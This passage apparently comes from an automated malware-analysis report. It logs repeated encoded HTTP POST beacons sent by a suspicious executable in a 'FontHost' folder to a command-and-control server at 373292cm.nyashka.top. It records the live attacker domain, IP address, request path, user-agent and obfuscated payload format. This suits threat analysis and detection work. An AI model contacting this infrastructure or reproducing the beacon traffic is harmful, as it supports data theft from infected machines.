                              Aug 25, 2024 15:44:33.178226948 CEST2504OUTData Raw: 5a 57 5c 55 51 43 54 5f 5b 5f 5a 51 59 56 58 55 57 50 5d 5a 57 59 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZW\UQCT_[_ZQYVXUWP]ZWYS]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/ ;D5##*>-3?+;X7,72 W?)+7 6/>&F$.Y/!
                              Aug 25, 2024 15:44:33.492508888 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:33.626281977 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:32 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              74192.168.2.55993180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:33.759103060 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:34.116697073 CEST2504OUTData Raw: 5a 57 5c 52 51 45 54 5e 5b 5f 5a 51 59 52 58 50 57 5c 5d 5c 57 5e 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZW\RQET^[_ZQYRXPW\]\W^STYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.\.0<!0^# %]*-?X%Z)>#\# 1,Q?)3#3=Y..&F$.Y/1
                              Aug 25, 2024 15:44:34.425937891 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:34.555819035 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:33 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              75192.168.2.55993280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:34.736835957 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:35.085256100 CEST2504OUTData Raw: 5a 51 59 50 54 43 51 5a 5b 5f 5a 51 59 53 58 55 57 50 5d 5a 57 51 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQYPTCQZ[_ZQYSXUWP]ZWQSZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.,#'#-040%X+->.=\+>+\74!!W<+ 0&;.&F$.Y/5


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              76192.168.2.55993380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:35.216965914 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1808
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:35.571774960 CEST1808OUTData Raw: 5a 51 5c 5f 54 48 51 5b 5b 5f 5a 51 59 5e 58 57 57 5c 5d 58 57 5e 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQ\_THQ[[_ZQY^XWW\]XW^S\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_./ 3D"-8]" ]+>0(X)[<.+# 4,S(:< 5Y;>&F$.Y/
                              Aug 25, 2024 15:44:35.900652885 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:36.102181911 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:35 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 26 56 28 26 3d 04 26 15 2c 16 30 33 39 0d 3e 3d 3c 00 29 2d 0b 17 24 16 2e 04 25 07 20 50 27 15 25 5a 28 2e 2e 56 26 01 3b 5d 2d 24 2b 5d 0c 13 22 14 20 3a 0f 03 26 05 23 00 2a 38 3f 5d 21 05 3a 5c 3f 14 03 51 3e 2f 3c 1d 3f 07 3f 1e 28 04 22 1c 3b 3b 36 02 2e 20 32 57 20 3e 2b 52 0d 11 27 0d 3f 3e 3a 0e 2a 3d 3f 5c 35 38 01 13 33 04 31 08 24 22 22 52 30 07 27 04 26 1c 39 1d 27 31 21 54 26 2b 22 11 31 11 3a 0e 22 08 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: &V(&=&,039>=<)-$.% P'%Z(..V&;]-$+]" :&#*8?]!:\?Q>/<??(";;6. 2W >+R'?>:*=?\5831$""R0'&9'1!T&+"1:"#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              77192.168.2.55993480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:35.336796999 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:35.694878101 CEST2500OUTData Raw: 5a 56 59 55 54 43 54 5f 5b 5f 5a 51 59 57 58 54 57 50 5d 5b 57 5b 53 55 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZVYUTCT_[_ZQYWXTWP][W[SUYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_._,5(# !\+=#<-6)>$4<#4!?7 0/&F$.Y/)
                              Aug 25, 2024 15:44:36.003511906 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:36.202578068 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:35 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              78192.168.2.55993580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:36.324201107 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:36.679203987 CEST2504OUTData Raw: 5f 50 59 53 51 47 54 59 5b 5f 5a 51 59 50 58 54 57 50 5d 58 57 50 53 5c 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _PYSQGTY[_ZQYPXTWP]XWPS\YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.^,#B5><_4)Y=>4\+=]+[(4<'P#/?*4##:;&F$.Y/
                              Aug 25, 2024 15:44:36.999111891 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:37.159194946 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:36 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              79192.168.2.55993680.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:37.290525913 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:37.647876024 CEST2504OUTData Raw: 5a 55 5c 5f 54 43 54 5f 5b 5f 5a 51 59 56 58 55 57 5d 5d 5a 57 5e 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZU\_TCT_[_ZQYVXUW]]ZW^S[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-,U8!-07![>(<.)=# <W##?*'X 0&..&F$.Y/!
                              Aug 25, 2024 15:44:37.970604897 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:38.097533941 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:37 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              80192.168.2.55993780.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:38.237131119 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:38.625220060 CEST2504OUTData Raw: 5a 51 5c 57 54 45 51 5b 5b 5f 5a 51 59 54 58 53 57 5b 5d 5d 57 50 53 5f 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZQ\WTEQ[[_ZQYTXSW[]]WPS_YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.^/,6># ]=(\+>&)='\ <S42$Q?9#40),>&F$.Y/)
                              Aug 25, 2024 15:44:38.898734093 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:39.029320002 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:38 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              81192.168.2.55993880.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:39.156984091 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:39.507100105 CEST2504OUTData Raw: 5a 56 5c 57 54 42 54 5a 5b 5f 5a 51 59 5f 58 55 57 58 5d 5d 57 51 53 54 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZV\WTBTZ[_ZQY_XUWX]]WQSTYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_.X,#C"<7#)\=>??X5<-'#?<#1#*) 0X,.&F$.Y/
                              Aug 25, 2024 15:44:39.833302021 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:39.963135004 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:39 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              82192.168.2.55993980.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:40.086914062 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:40.444598913 CEST2500OUTData Raw: 5f 51 5c 50 54 49 51 5a 5b 5f 5a 51 59 57 58 5f 57 5a 5d 58 57 59 53 59 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _Q\PTIQZ[_ZQYWX_WZ]XWYSYYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/$"'#0*+-/<*(#40#20R?*4" 2..&F$.Y/
                              Aug 25, 2024 15:44:40.752379894 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:40.881942034 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:40 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              83192.168.2.55994080.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:41.011070967 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              84192.168.2.55994180.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:41.370332956 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 1828
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:41.726031065 CEST1828OUTData Raw: 5f 50 5c 56 54 46 54 5b 5b 5f 5a 51 59 53 58 50 57 5e 5d 5f 57 5c 53 5b 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _P\VTFT[[_ZQYSXPW^]_W\S[YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-; ?@5 6)[ \+-%[+[4#Z+Q !+(: #3!,>&F$.Y/5
                              Aug 25, 2024 15:44:42.029735088 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:42.163701057 CEST308INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:41 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 152
                              Connection: keep-alive
                              Data Raw: 09 1d 25 0c 29 0b 36 5b 31 05 0e 1b 30 30 22 1e 3d 3d 20 00 29 3d 0b 14 30 28 04 06 32 00 05 0c 27 05 3d 11 2b 2d 29 08 26 11 09 5a 3a 0e 2b 5d 0c 13 22 16 20 29 31 03 25 2f 20 5d 3e 28 3f 5e 36 02 2e 1e 3f 04 36 0c 3f 11 24 13 3e 29 27 5b 2a 3a 0c 53 3b 2b 26 02 2e 56 32 51 37 2e 2b 52 0d 11 24 56 28 3e 21 57 29 00 20 00 21 06 23 5b 27 2e 3e 1e 32 54 32 52 24 29 0e 5d 26 1c 1b 51 24 1f 3a 0d 26 38 3d 03 32 3c 3e 0d 21 22 23 54 2c 00 22 57 01 33 55 56
                              Data Ascii: %)6[100"== )=0(2'=+-)&Z:+]" )1%/ ]>(?^6.?6?$>)'[*:S;+&.V2Q7.+R$V(>!W) !#['.>2T2R$)]&Q$:&8=2<>!"#T,"W3UV


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              85192.168.2.55994280.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:41.493803024 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2500
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:41.850790024 CEST2500OUTData Raw: 5f 55 5c 50 51 47 51 59 5b 5f 5a 51 59 57 58 5f 57 5a 5d 5c 57 5d 53 5a 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: _U\PQGQY[_ZQYWX_WZ]\W]SZYY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-, ;C5]#5[*-<\?=5(+] 7V /(*+_"09\8&F$.Y/
                              Aug 25, 2024 15:44:42.169329882 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:42.299748898 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:41 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              86192.168.2.55994380.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:42.432143927 CEST322OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Aug 25, 2024 15:44:42.790970087 CEST2504OUTData Raw: 5a 57 59 52 54 43 51 5b 5b 5f 5a 51 59 5e 58 56 57 5a 5d 5c 57 58 53 5d 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZWYRTCQ[[_ZQY^XVWZ]\WXS]YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_./##=49]+=/?X%^+-;#/Q 18<< V9X8&F$.Y/
                              Aug 25, 2024 15:44:43.104332924 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:43.235666990 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:42 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              87192.168.2.55994480.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
                              Aug 25, 2024 15:44:43.379030943 CEST346OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                              Host: 373292cm.nyashka.top
                              Content-Length: 2504
                              Expect: 100-continue
                              Connection: Keep-Alive
                              Aug 25, 2024 15:44:43.732184887 CEST2504OUTData Raw: 5a 50 59 50 54 44 54 5b 5b 5f 5a 51 59 5e 58 54 57 5b 5d 5c 57 59 53 5f 59 59 5f 5a 5e 5b 5a 50 5f 5e 57 51 55 5f 55 50 58 5e 59 51 50 53 51 5b 5a 5f 58 58 5d 5b 50 5c 58 5d 56 5c 52 5d 55 56 5c 5d 59 5b 50 5f 57 55 47 5a 5a 5a 47 5c 5d 5f 56 5b
                              Data Ascii: ZPYPTDT[[_ZQY^XTW[]\WYS_YY_Z^[ZP_^WQU_UPX^YQPSQ[Z_XX][P\X]V\R]UV\]Y[P_WUGZZZG\]_V[QWRY_\SQPW^]QP^Y^WP_[PT^A_Z^\^ZQX]XWXQZX_Z[TC\YWZPX[Q][\_T_IYSV[[]TXSYYUBYTX[WBRX]]\XW_XRZ^ZY]F\\Z_P^_-/#C6=#"3>*3?-!([84Z7R42'?*'^ !8&F$.Y/
                              Aug 25, 2024 15:44:44.073824883 CEST25INHTTP/1.1 100 Continue
                              Aug 25, 2024 15:44:44.207602978 CEST158INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Sun, 25 Aug 2024 13:44:43 GMT
                              Content-Type: text/html; charset=UTF-8
                              Content-Length: 4
                              Connection: keep-alive
                              Data Raw: 3b 55 5f 5b
                              Data Ascii: ;U_[


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              88192.168.2.55994580.211.144.156806968C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              TimestampBytes transferredDirectionData
